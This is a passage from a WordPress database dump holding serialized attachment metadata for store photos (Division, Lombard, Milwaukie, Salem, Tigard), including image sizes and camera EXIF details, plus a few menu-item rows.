\"file\";s:29:\"2015/02/Division_inside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Division_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Division_inside-2-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Division_inside-2-1024x654.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Division_inside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Division_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Division_inside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Division_inside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Division_inside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:28:\"Division_inside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421423571;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.5\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(226,85,'_wp_attached_file','2015/02/Division_outside-2.jpg'),(227,85,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2657;s:4:\"file\";s:30:\"2015/02/Division_outside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Division_outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Division_outside-2-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Division_outside-2-1024x756.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:756;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Division_outside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"Division_outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"Division_outside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Division_outside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Division_outside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:29:\"Division_outside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421420626;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(228,86,'_wp_attached_file','2015/02/Lombard_inside-2.jpg'),(229,86,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2071;s:4:\"file\";s:28:\"2015/02/Lombard_inside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Lombard_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Lombard_inside-2-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Lombard_inside-2-1024x589.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:589;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Lombard_inside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Lombard_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Lombard_inside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Lombard_inside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Lombard_inside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:27:\"Lombard_inside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421669958;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.6\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(230,87,'_wp_attached_file','2015/02/Lombard_outside-2.jpg'),(231,87,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2582;s:4:\"file\";s:29:\"2015/02/Lombard_outside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Lombard_outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Lombard_outside-2-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Lombard_outside-2-1024x734.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Lombard_outside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Lombard_outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Lombard_outside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Lombard_outside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Lombard_outside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:28:\"Lombard_outside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421671111;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"21\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.16666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(232,88,'_wp_attached_file','2015/02/Milwaukie_inside.jpg'),(233,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2399;s:4:\"file\";s:28:\"2015/02/Milwaukie_inside.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Milwaukie_inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:27:\"Milwaukie_inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:2.7999999999999998;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421076224;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(234,89,'_wp_attached_file','2015/02/Milwaukie_outside.jpg'),(235,89,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2893;s:4:\"file\";s:29:\"2015/02/Milwaukie_outside.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside-300x241.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside-1024x823.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:823;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Milwaukie_outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:28:\"Milwaukie_outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421077323;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(236,90,'_wp_attached_file','2015/02/Salem_inside-2.jpg'),(237,90,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:1854;s:4:\"file\";s:26:\"2015/02/Salem_inside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Salem_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Salem_inside-2-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Salem_inside-2-1024x527.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:527;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Salem_inside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Salem_inside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Salem_inside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Salem_inside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Salem_inside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:25:\"Salem_inside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421683909;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"1.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(238,91,'_wp_attached_file','2015/02/Salem_Outside-2.jpg'),(239,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:1572;s:4:\"file\";s:27:\"2015/02/Salem_Outside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Salem_Outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Salem_Outside-2-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Salem_Outside-2-1024x447.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Salem_Outside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"Salem_Outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Salem_Outside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Salem_Outside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Salem_Outside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:26:\"Salem_Outside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421685097;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(240,92,'_wp_attached_file','2015/02/Tigard_Inside_-2.jpg'),(241,92,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2120;s:4:\"file\";s:28:\"2015/02/Tigard_Inside_-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Tigard_Inside_-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Tigard_Inside_-2-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Tigard_Inside_-2-1024x603.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:603;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Tigard_Inside_-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Tigard_Inside_-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Tigard_Inside_-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Tigard_Inside_-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Tigard_Inside_-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:27:\"Tigard_Inside_-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421674018;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.8\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(242,93,'_wp_attached_file','2015/02/Tigard_Site_Outside-2.jpg'),(243,93,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3600;s:6:\"height\";i:2389;s:4:\"file\";s:33:\"2015/02/Tigard_Site_Outside-2.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Tigard_Site_Outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Tigard_Site_Outside-2-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"Tigard_Site_Outside-2-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Tigard_Site_Outside-2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"Tigard_Site_Outside-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Tigard_Site_Outside-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"Tigard_Site_Outside-2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:34:\"Tigard_Site_Outside-2-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:32:\"Tigard_Site_Outside-2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421675367;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"29\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(244,83,'_wp_page_template','page-fullwidth.php'),(245,109,'_menu_item_type','post_type'),(246,109,'_menu_item_menu_item_parent','67'),(247,109,'_menu_item_object_id','83'),(248,109,'_menu_item_object','page'),(249,109,'_menu_item_target',''),(250,109,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(251,109,'_menu_item_xfn',''),(252,109,'_menu_item_url',''),(254,1,'_edit_lock','1424728107:2'),(255,2,'_edit_last','2'),(261,122,'_menu_item_type','post_type'),(262,122,'_menu_item_menu_item_parent','67'),(263,122,'_menu_item_object_id','120'),(264,122,'_menu_item_object','page'),(265,122,'_menu_item_target',''),(266,122,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(267,122,'_menu_item_xfn',''),(268,122,'_menu_item_url',''),(273,143,'_wp_attached_file','2015/02/loans.jpg'),(274,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:318;s:6:\"height\";i:157;s:4:\"file\";s:17:\"2015/02/loans.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"loans-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"loans-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"loans-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"loans-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"loans-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"loans-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:16:\"loans-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(275,144,'_wp_attached_file','2015/02/gold.jpg'),(276,144,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:318;s:6:\"height\";i:157;s:4:\"file\";s:16:\"2015/02/gold.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"gold-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"